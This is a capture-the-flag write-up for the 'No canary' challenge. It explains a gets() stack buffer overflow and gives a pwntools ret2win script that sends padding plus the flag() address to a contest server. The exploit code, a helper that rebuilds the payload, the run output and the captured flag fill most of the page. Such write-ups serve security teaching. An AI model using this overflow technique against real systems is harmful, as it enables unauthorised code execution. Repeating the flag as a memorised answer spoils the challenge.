No canary [binary]

No canary

Agriculture is the most healthful, most useful and most noble employment of man. Can you call the flag function in this program (source)?

Recon

In the source we see a main function that asks us for a name as input and then prints that name back.

We also see a flag function which prints the flag. The vulnerability is the small name buffer in combination with gets, which is a classic buffer overflow. The goal is to overflow the buffer and then return to the flag function.

To get the address of flag we use objdump:

$ objdump -x no_canary | grep flag$
0000000000401186 g     F .text  0000000000000013              flag

Solution

from pwn import *

# Connect to the challenge service.
s = remote("shell.actf.co", 20700)

# Fill the name buffer, then overwrite the saved return address with the
# address of flag() taken from objdump (0x401186). p64 packs it as a
# little-endian 8-byte value; it is sent three times so that one copy
# lands on the return slot.
buf = b"A" * 32
buf += p64(0x0000000000401186)
buf += p64(0x0000000000401186)
buf += p64(0x0000000000401186)
buf += b"\n"

print(s.recvuntil(b"name?"))
s.send(buf)

# Read back the greeting that echoes our input, then the flag printed by flag().
for _ in range(5):
    print(s.recvline())
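To make the mechanics of the payload explicit, here is an added example (not part of the original writeup): it pulls the address out of the objdump symbol line shown above, packs it the way pwntools' p64 does, rebuilds the same payload, and shows why the program echoes `\x86\x11@` after the A's (the high zero bytes of the address terminate the string, and 0x40 is `@`). The 32-byte padding is taken from the script; the exact stack layout is not stated on the page and is not assumed here.

```python
import struct

# Constructed copy of the `objdump -x no_canary | grep flag$` line from the writeup.
OBJDUMP_LINE = "0000000000401186 g     F .text  0000000000000013              flag"


def symbol_address(objdump_output, name):
    """Return the address of `name` from objdump symbol-table output.

    Each symbol line starts with a 16-hex-digit address and ends with the
    symbol name, which is what the `grep flag$` in the writeup relies on.
    """
    for line in objdump_output.splitlines():
        fields = line.split()
        if fields and fields[-1] == name:
            return int(fields[0], 16)
    raise KeyError(name)


def p64(value):
    """Little-endian 8-byte packing, equivalent to pwntools' p64 on amd64."""
    return struct.pack("<Q", value)


def build_payload(padding, ret_addr, copies=3):
    """Padding bytes followed by `copies` repetitions of the target address.

    The writeup sends three copies after 32 bytes of padding so that one of
    them overwrites the saved return address.
    """
    return b"A" * padding + p64(ret_addr) * copies + b"\n"


def echoed_tail(payload):
    """What printf("%s") echoes back: the input up to the first NUL byte.

    The address 0x401186 packs as 86 11 40 00 00 00 00 00, so the echo stops
    after three bytes and 0x40 is displayed as '@'.
    """
    body = payload.split(b"\n", 1)[0]
    return body.split(b"\x00", 1)[0]


def recover_address(tail, padding):
    """Reassemble the echoed little-endian address bytes into an integer."""
    addr_bytes = tail[padding:]
    return int.from_bytes(addr_bytes.ljust(8, b"\x00"), "little")
```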

Output:

$ python solve_no_canary.py 
[+] Opening connection to shell.actf.co on port 20700: Done
Ahhhh, what a beautiful morning on the farm!

       _.-^-._    .--.
    .-'   _   '-. |__|
   /     |_|     \|  |
  /               \  |
 /|     _____     |\ |
  |    |==|==|    |  |
  |    |--|--|    |  |
  |    |==|==|    |  |
^^^^^^^^^^^^^^^^^^^^^^^^

Wait, what? It's already noon!
Why didn't my canary wake me up?
Well, sorry if I kept you waiting.
What's your name?
 Nice to meet you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x11@!

actf{that_gosh_darn_canary_got_me_pwned!}

Flag

actf{that_gosh_darn_canary_got_me_pwned!}